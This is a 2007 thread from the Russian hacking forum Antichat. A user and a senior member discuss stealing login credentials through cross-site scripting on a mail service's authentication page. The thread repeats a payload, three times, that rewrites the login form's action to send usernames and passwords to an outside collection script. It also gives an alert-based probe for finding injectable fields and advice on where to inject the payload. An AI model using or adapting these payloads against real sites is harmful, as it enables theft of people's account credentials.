Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

02.08.2007, 16:10
|
|
Участник форума
Регистрация: 10.09.2006
Сообщений: 160
Провел на форуме: 619440
Репутация:
96
|
|
судя по тесту, если отправить юзверя на
Код HTML:
http://www.gmail.com/auth.html?login=“><script>document.auth.action=
‘http://myserv.jino.net/pass.php’</script>
, то на сервере останутся его логин с пассом. но это ведь не так?
Последний раз редактировалось bulbazaur; 03.08.2007 в 02:22..
|
|
|

06.08.2007, 16:13
|
|
Участник форума
Регистрация: 10.09.2006
Сообщений: 160
Провел на форуме: 619440
Репутация:
96
|
|
блин ответте мне 
|
|
|

08.08.2007, 00:17
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме: 3372120
Репутация:
2565
|
|
Сообщение от bulbazaur
блин ответте мне 
Во-первых более подробно опиши ситуацию,
во-вторых внимательно перечитай статью.
Из твоего примера, я понял что ты пытаешься провести xss там, где его нет (gmail.com). Обязательным условием реализации метода, является наличие xss на атакуемом сервере!
|
|
|

08.08.2007, 01:04
|
|
Участник форума
Регистрация: 10.09.2006
Сообщений: 160
Провел на форуме: 619440
Репутация:
96
|
|
Получается, такую фичу можно проделать только с сайтом, у которого хсс в полях входа? а как тогда определить, есть там хсс или нет?
|
|
|

08.08.2007, 20:58
|
|
Участник форума
Регистрация: 10.09.2006
Сообщений: 160
Провел на форуме: 619440
Репутация:
96
|
|
2 neval
я знаю что такое хсс, и даже представь себе, знаю что такое сниффер. просто как проверить логин на хсс? алерта же никак не будет...
|
|
|

09.08.2007, 00:17
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме: 3372120
Репутация:
2565
|
|
Сообщение от bulbazaur
2 neval
я знаю что такое хсс, и даже представь себе, знаю что такое сниффер. просто как проверить логин на хсс? алерта же никак не будет...
Проверяется, так же как всегда например (если нет фильтров): "><script>alert("xss");</script>, если сработает алерт, то есть xss.
Но вообще в статье приведен только лишь пример с уязвимым полем логин, на самом деле уязвимость может присутствовать в любом месте страницы, например в поиске. При этом метод будет работать, необходимо чтобы уязвимость присутствовала именно на странице с формой аутентификации.
|
|
|

09.08.2007, 00:52
|
|
Участник форума
Регистрация: 10.09.2006
Сообщений: 160
Провел на форуме: 619440
Репутация:
96
|
|
ладно, спасибо  т.е. допустим на гугло.мейле есть поиск с хсс, причем должен быть именно гет запрос, да? так вот, будет ли это тогда работать?
http://www.gmail.com/auth.html?login=“><script>document.auth.action=
‘http://myserv.jino.net/pass.php’</script>
|
|
|

09.08.2007, 00:57
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме: 3372120
Репутация:
2565
|
|
Сообщение от bulbazaur
ладно, спасибо  т.е. допустим на гугло.мейле есть поиск с хсс, причем должен быть именно гет запрос, да? так вот, будет ли это тогда работать?
да, только код с подменой обработчика
Код:
“><script>document.auth.action=
‘http://myserv.jino.net/pass.php’</script>
необходимо подставлять в уязвимый параметр, а не в логин.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|